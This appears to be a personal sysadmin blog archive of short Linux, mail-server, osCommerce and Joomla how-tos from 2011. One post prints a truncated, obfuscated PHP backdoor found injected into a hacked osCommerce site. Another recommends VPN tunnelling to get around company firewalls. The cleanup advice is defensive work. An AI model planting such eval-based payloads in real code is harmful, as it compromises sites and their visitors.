Posts

Showing posts from April, 2011

Bypass Firewall

If you can't connect to games or websites due to banned ip address or location, it's your lucky day!. Some games or websites only allow their fellow countrymen to use the service like vindictus, ragnarok servers (before) and some others. Check the softwares below: hotspot shield - This is easy to use just download and install this will install a vpn access to their server and give you a us ip address for free! yourfreedom - this one is also good but disconnects you in some time best to bypass company firewalls and other stuff this will tunnel you to yourfreedom servers and allow you to surf you favorite site!

Water Wonder Resort

Image
Water Wonder Resort Location: Inarawan Antipolo City To go here from Cubao Gateway Side - Ride Jeep or Fx going to Padilla ask the driver you are going to Water Wonder Resort. From there you can take a tricycle. Best days to go here are not April or May since there are many people going here from Antipolo Area Earn money register free!

IDE RAID1 ON UBUNTU

IDE RAID1 ON UBUNTU http://www.howtoforge.com/how-to-install-ubuntu8.04-with-software-raid1 NOTE ON THE DOCUMENT WHERE YOU NEED TO MAKE THE OTHER DISK BOOTABLE USE sudo grub How To Install Ubuntu 8.04 With Software RAID1 This short guide explains how you can configure software RAID1 during the initial installation of an Ubuntu 8.04 ("Hardy Heron") system. During Ubuntu installation: • From the “Partitions Disks” dialog box, select “Manually edit the partition table”. • Select the first disk (”sda”). • Say yes to “Create a new empty partition table on this device?”. • Use the dialog boxes to create one primary partition large enough to hold the root filesystem. • For “How to use this partition” select “physical volume for RAID“, not the default “Ext3 journaling file system”. • Make the partition bootable. • Use the dialogs to create one other primary partition taking up the remaining disk space. Later this will be used for swap. • For “How to use this part...

Postfix Message and Mailbox Limit

Postfix Message and Mailbox Limit Also Calculator for bytes to mbytes http://www.123marbella.net/en/free-bandwith-calculator.html http://muhdzamri.blogspot.com/2007/02/postfix-mailbox-size-limit-and-message.html

Dual Boot Ubuntu with Xp

Dual Booting Linux and Windows on different hard drive assuming you have installed linux and windows not touching each other upon installation. 1st Hard Drive - Ubuntu Linux 8.04 Hardy 2nd Hard Drive - Windows XP Pro Primary Master is Linux Primary Slave is Windows We set Linux as the OS to Boot why? Because I want it. Edit menu.list in /boot/grub ==================================================== title Ubuntu 8.04, kernel 2.6.24-16-generic root (hd0,0) kernel /boot/vmlinuz-2.6.24-16-generic root=UUID=1653c057-1c9d-4fac-a46e-fe9fa76e4b7b ro quiet splash initrd /boot/initrd.img-2.6.24-16-generic quiet title Ubuntu 8.04, kernel 2.6.24-16-generic (recovery mode) root (hd0,0) kernel /boot/vmlinuz-2.6.24-16-generic root=UUID=1653c057-1c9d-4fac-a46e-fe9fa76e4b7b ro single initrd /boot/initrd.img-2.6.24-16-generic title Ubuntu 8.04, memtest86+ root (hd0,0) kernel /boot/memtest86+.bin q...

Virtualmin Postfix Error

Yesterday the mail was running smoothly no problem at all. I added some RBL spamcop sorbs and other stuff just like that also edited spamassasin rules. then logged out. My Boss wake me that the mail was not working !!! DANG So I hurried to check. Tail the log $tail -f /var/log/maillog !!!! IT WAS BLOCKING 127.0.0.1 local himself I checked whats the problem then i disabled ( commented out amavis in posftfix configuration ) The 127.0.0.1 blocking is gone BUT! i cannot recive mails damn! it says "unknown user in virtual table" I checked maybe it got hacked but no there's the user can login and send mails Hmm proceed to re load old main.cf configuration that working maybe i deleted something. But no still same Check Again Then I tried stoping amavisd IT CANT BE STOPPED some pid "eh" i look again close it says its not running! I started amavisd and whoa all worked again. Problem boss asked "where are the mails yesterday" usually it bounces bac...

Oscommerce disable un -needed links in Information Box

To remove un-necessary items edit catalog/includes/modules/boxes/ bm_information.php find the lines you dont need Below is the code: $data = '<div class="ui-widget infoBoxContainer">' .               '  <div class="ui-widget-header infoBoxHeading">' . MODULE_BOXES_INFORMATION_BOX_TITLE . '</div>' .               '  <div class="ui-widget-content infoBoxContents">' . IN THE MIDDLE OF THIS ARE SOME CODES AND LINKS I DON NEED  I ONLY NEED CONTACT US SO I DELETED THE OTHER STUFF DELETE HERE               '    <a href="' . tep_href_link(FILENAME_CONTACT_US) . '">' . MODULE_BOXES_INFORMATION_BOX_CONTACT . '</a>' .               '  </div>' .  ...

Oscommerce disable header buttons login cart

I needed to disable the cart function of the oscommerce first step is disable the most visible item the login, checkout buttons In stylsheet.css find this add the display: none; #headerShortcuts {   display: none;   float: left;   margin-top: 5px; }

JFolder::create: Could not create directory

I got this weird problem in Jommla where I cannot install this module. Since we also have access to our own server I checked the following as stated on some other websites monstly on joomla's site. (directories might be differ but we will be talking about your installation directory) in you installation directory check the tmp folder change permission to 777 then change back to 755 after you check if the installation continues. If this solve the problem you need to fix folder and file permission. DO NOT LEAVE tmp at 777 !!! check logs directory (though i dont know why some stated this) also check logs for the problems this where the tail command comes handy. check the configuration.php and look for these lines  var $log_path = '/home/freakazoid/logs';  var $tmp_path = '/home/freakazoid/tmp'; change these to some folder where there is read/write access (A SECURE ONE) I changed my default tmp to global tmp var $tmp_path = './tmp'; this wi...

Address already in use: make_sock: could not bind to address - Apache - HTTPD Error

Image
Address already in use: make_sock: could not bind to address - Apache - HTTPD Error The problem is the apache is running but in webmin it says it's down (some say it's the PID) so I check who is using the port [root@jmaz] netstat -lnp | grep :80 In webmin you can check the process in Webmin->System-> Running Process and kill the process there just kill them all [root@jmaz] killall httpd [root@jmaz] service httpd start

DDOS Deflate fix for wrong email format sent

This one is a fix for the wrong email sent by ddos deflate. edit the configuration and use this line. netstat -ntu | grep ':' | awk '{print $5}' | sed 's/::ffff://' | cut -f1 -d ':' | sort | uniq -c | sort -nr

A encoded script in one of the hacked sites using oscommerce

 A code that was injected to one of the oscommerce sites <?php eval(base64_decode("ZnVuY3Rpb24gZXZhbGhJT29MZ0xLWlltdEooJHMpe2ZvciAoJGEgPSAwOyAkYSA8PSBzdHJsZW4oJHMpLTE7ICRhKysgKXskZSAuPSAkc3tzdHJsZW4oJHMpLSRhLTF9O31yZXR1cm4oJGUpO31ldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiPTAzT3BBVFdMbEdUUnhtYzBsa1VxNTBUc0ZtZGxSQ0tsUjJialZHWmZSak5sTlhZaUJpYnlWSGRsSjNlZ2tDTVp0VWFNRkZieVJYU1NwbVRQeFdZMlZHSm9rMVNweFVVc0pIZEpKbGFPOUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGhJT29MZ0xLWlltdEooJzspKSI9c1RLaTBUUDNKV2IxY1ZZaWdTV0xsR1RSeG1jMGxrVXE1MFRzRm1kbEJTUGdFMVFTRjNZVGwzVklKbFJ5UlZUNXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiN2tpSTkwRVNraG1Vek1tSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWjlNa1laSlZkaGhsZXhsRVMzVjBhd3hXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiPXNUS2kwVFBCTkdNU2hVWWlnU1dMbEdUUnhtYzBsa1VxNTBUc0ZtZGwxamUybFhlcVYwWmhSM1EycEhjRnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vTGdMS1pZbXRKKCc7KSkiPXN...

Running Linux on Virtual Box

Linux is one of the operating systems out there that is free no need to pay just download and install. For new technical people that want to use this piece of software (yes it's a software not a food) you can download ubuntu, or centos (my choice or even fedora) at Distrowatch.Com where before I check always for new distribution. Like microsoft it has many types example microsoft has windows xp, 2000, Me, 98 Vista, Windows 7 Linux has much more. Linux is like the DOS prompt then developers begin to create window managers for it so it looks like your average windows now. Very easy to install and use. Though you don't want to erase your 1 million dollar software pre installed in your alienware box you have the alternative to use virtualbox the free emulator (something like that in layman's term) you install this first and you can install linux inside the virtualbox like a window when you play windowed games like ragnarok, flyff perfect world and other games. 2 steps ...

Troubleshooting Hacked Oscommerce

First things first, Oscommerce is a good software and we use it. Some old version that we have got hacked (before I get in to the company) To check what files are compromised check the dates of the files thiis is the most important since ou will see what are modified. The fastest way I did was to grep -r 'base64' * since the hacker injected some encrypted code it the files this will let you see what files have the code. I'm not a guru though. delete the lines that shouldn't be there Also they put codes in .htaccess and this will let your website redirect to some other sites .ru site Check also you php.ini since they also get inside of that and put this base decode blah. secure your tmp folder and chmod your file to 755. Also the last measure is to auto block the ip addresses that do lots of connection via anti ddos (dosdeflate) Well then after that hopefully the hackers will get angry and ddos your site till it gets down :)

complete email centos postfix dkim spamassassin

Remove sendmail yum remove sendmail Postfix yum install postfix yum install cyrus-sasl cyrus-sasl-devel cyrus-sasl-gssapi cyrus-sasl-md5 cyrus-sasl-plain /etc/postfix/main.cf myhostname = mail.example.com mydomain = example.com myorigin = $mydomain home_mailbox = Maildir/ mailbox_command = mynetworks = 127.0.0.0/8 inet_interfaces = all mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain relay_domains = local_recipient_maps = smtpd_sasl_local_domain = smtpd_sasl_auth_enable = yes smtpd_sasl_type = cyrus smtpd_sasl_security_options = noanonymous broken_sasl_auth_clients = yes smtpd_sasl_authenticated_header = yes smtpd_recipient_restrictions = permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination /etc/postfix/master.cf smtps inet n - n - - smtpd -o smtpd_sasl_auth_enable=yes -o smtpd_reject_unlisted_sender=yes -o smtpd_recipient_restrictions=permit_sasl_authenticated,reject -o broken_...